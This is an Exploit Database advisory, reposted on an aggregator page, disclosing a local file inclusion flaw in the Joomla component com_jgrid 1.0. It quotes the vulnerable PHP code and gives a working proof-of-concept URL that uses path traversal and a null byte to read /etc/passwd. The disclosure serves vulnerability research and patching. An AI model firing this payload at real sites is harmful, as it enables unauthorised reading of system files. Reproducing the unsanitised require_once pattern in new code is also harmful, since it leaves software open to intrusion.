Joomla! Component com_jgrid 1.0 – Local File Inclusion

• Exploit Database
• 13 阅读

• 作者： Salvatore Fresta
  日期： 2010-08-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14656/

• Jgrid 1.0 Joomla Component Local File Inclusion Vulnerability
  
   NameJgrid
   Vendorhttp://datagrids.clubsareus.org
   Versions Affected 1.0
  
   AuthorSalvatore Fresta aka Drosophila
   Website http://www.salvatorefresta.net
   Contact salvatorefresta [at] gmail [dot] com
   Date2010-08-14
  
  X. INDEX
  
   I.ABOUT THE APPLICATION
   II. DESCRIPTION
   III.ANALYSIS
   IV. SAMPLE CODE
   V.FIX
   
  
  I. ABOUT THE APPLICATION
  ________________________
  
  DATA GRID Component built on the popular EXTJS Framework.
  
  
  II. DESCRIPTION
  _______________
  
  A parameter is not properly sanitised before beingused
  by the require_once function.
  
  
  III. ANALYSIS
  _____________
  
  Summary:
  
   A) Local File Inclusion
   
  
  A) Local File Inclusion
  _______________________
  
  Thecontrollerparameter in jgrid.php is notsanitised
  beforebeingused by the PHP function's require_once().
  This allows a guest to include local files. The following
  is the affected code:
  
  if($controller = JRequest::getVar('controller')) {
  	require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
  }
  
  
  IV. SAMPLE CODE
  _______________
  
  A) Local File Inclusion
  
  http://site/path/index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
  
  
  V. FIX
  ______
  
  No fix.